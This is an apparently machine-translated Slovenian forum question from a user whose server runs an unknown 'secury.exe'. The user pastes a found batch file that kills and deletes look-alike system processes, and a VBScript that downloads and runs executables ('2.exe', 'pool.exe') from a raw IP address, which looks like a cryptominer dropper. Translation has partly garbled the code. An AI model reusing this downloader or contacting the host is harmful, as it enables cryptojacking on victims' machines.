V upravitelju opravil imam naslednje situacije:

Ne vem, kakšno aplikacijo je, vendar zagotovo ni Steamov zagonski strežnik, ker ga nisem namestil in tudi ne morem odstraniti.

Če poskušam ugotoviti, kakšno aplikacijo je prek tega koraka:

Vidim nekaj takega:

V pripomočku MS Config nisem našel ničesar, kar bi izgledalo kot secury.exe.

Ko odprem lokacijo datoteke, vidim tri datoteke:

m.bat, b.exe, 4.vbs.

Spodaj je vsebina m.bat:

taskkill / f / t / im secury.exe c: ProgramData secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe naloga / f / t / im MSASCui.exe naloga / f / t / im SystemSettlngs.exe naloga / f / t / im SystemSetting.exe naloga / f / t / im Process.exe nalogo / f / t / im winlnlt.exe naloga / f / t / im WindowsUpgrade.exe naloga / f / t / im msdc.exe naloga / f / t / im Fiddlere.exe naloga / f / t / im shovst.exe naloga / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe naloga / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe naloga / f / t / im shovsts.exe naloga / f / t / im fcty.exe opravilni nalogi / f / t / im so.osl.exe opravilni nalogi / f / t / im TrustedInstaller.exe del C: Windows System32 \ t C: Windows namestitveni program TrustedInstaller.exe del C: Programski podatki kingsoft.exe del C: Programski podatki expl0rer.exe del C: Programski podatki ieplare.exe del C: ProgramData nssm.exe del C: \ t Programski podatki MSASCui.exe del C: Pro ProgramData SystemSetting.exe del C: ProgramData Process.exe del C: Programski podatki winlnlt.exe del C: Programski podatki WindowsUpgrade.exe del C: ProgramData msdc.exe Del C: Programski Podatki Fiddlere.exe del C: Programski Podatki shodni.exe del C: Programski Podatki lqrtqe.exe del C: Programski Podatki apkls.exe del C: Programski podatki winlog.exe del C: Programski podatki svchosts.exe del C: Programski podatki win1ogins.exe del C: Programski podatki shavsts.exe del C: Programski podatki fcty.exe del C: Programski podatki pool.exe del C: ProgramData pool2.exe del C: Programski podatki: pool3.exe

Naprej gre 4.vbs:

Nastavi xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Odprite "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Nastavite sGet = CreateObject ("ADODB.Stream") ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: Programski podatki s2.exe", 2 Nastavi xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: ProgramData pool2.exe", 2 CreateObject ("WScript.Shell"). Zaženi "C: ProgramData \ _ pool3.exe" CreateObject ( "WScript.Shell"). Zaženi "del C: Programski podatki \ t

Kaj lahko storim, da preprečim, da bi sekury.exe zlorabil računalniške moči mojega strežnika?

PS Sem izvedel Avast popolno preverjanje mojega računalnika, vendar ni našel nič narobe.